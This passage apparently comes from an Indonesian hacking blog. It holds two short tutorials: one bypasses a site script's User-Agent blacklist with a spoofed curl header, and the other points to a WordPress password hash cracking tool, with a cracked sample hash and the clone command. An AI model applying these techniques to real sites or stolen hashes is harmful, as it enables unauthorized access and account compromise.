Nah, tenang saja hal ini dapat kita bypass. Bagaimana caranya? Caranya adalah kita ganti HTTP Request User-Agentnya, menjadi user-agent yang tidak terdapat kedalam list (blacklist) script tadi.

Anda bisa gunakan cara yang sama yaitu curl (CLI/CMD) atau bisa juga dengan script biasa. Tambahkan Opsi -H pada curl nya, untuk mengirimkan request HTTP.

curl -v -k -H "User-Agent: Deepweb" http://website.com/script.php
(terlihat beda bukan? kita berhasil membypassnya. lihat bahwa dengan kita menambahkan -H User-Agent pada HTTP Requestnya dan menggantinya dengan User-Agent Lain.(not blacklisted) . Hasilnya menunjukkan 200 OK. [halaman dapat diakses] )

Paham? Mudah Bukan :D


Oke Sekian dulu, semoga bermanfaat :D

WordPress HASH Decrypter Tools

 
Okee, selamat sore kawan. Kemarin gua share sedikit tips sederhana bagaimana mendecrypt  sebuah hash hasil fungsi cyrpt dan password_hash pada PHP. Contohnya adalah seperti ini $1$bcl63GxF$FkUtrx6OxdSusl6aTLnYR . Kalian bisa cek artikelnya disini http://www.indoxploit.or.id/2017/03/simple-way-to-decrypt-hash-from-crypt.html.

Oke, kali ini gua akan membahas hal yang sama yaitu mendecrypt hash lagi. Tapi jenis hash apa kali ini?

Karena banyaknya orang yang merequest dan bingung bagaimana memecahkan hash dari CMS WordPress. Kali ini akan gua share tips sederhananya :D

CMS WordPress merupakan salah satu cms yang menggunakan proses hashing yang rumit dalam mengamankan passwordnya. Tidak seperti CMS lain yang rata-rata masih memakai MD5/SHA1.

Oke tidak usah banyak bicara, kita langsung masuk ke pembahasan saja.

( Jalankan di Terminal/CMD [ CLI Based ] )

Kalian lihat bagian ini:
[+]$P$Bd2v1uNoAchuGhnGiwFdS52wmk5.8X0 -> indoxploit (OK)

itu tandanya Hash tersebut sesuai dengan kata 'indoxploit'

Kalian Bisa Mendapatkan Tools ini di Github.

Atau bisa Mendownloadnya:
git clone https://github.com/agussetyar/wpdecrypt.git


Oke sekian dulu, semoga bermanfaat :D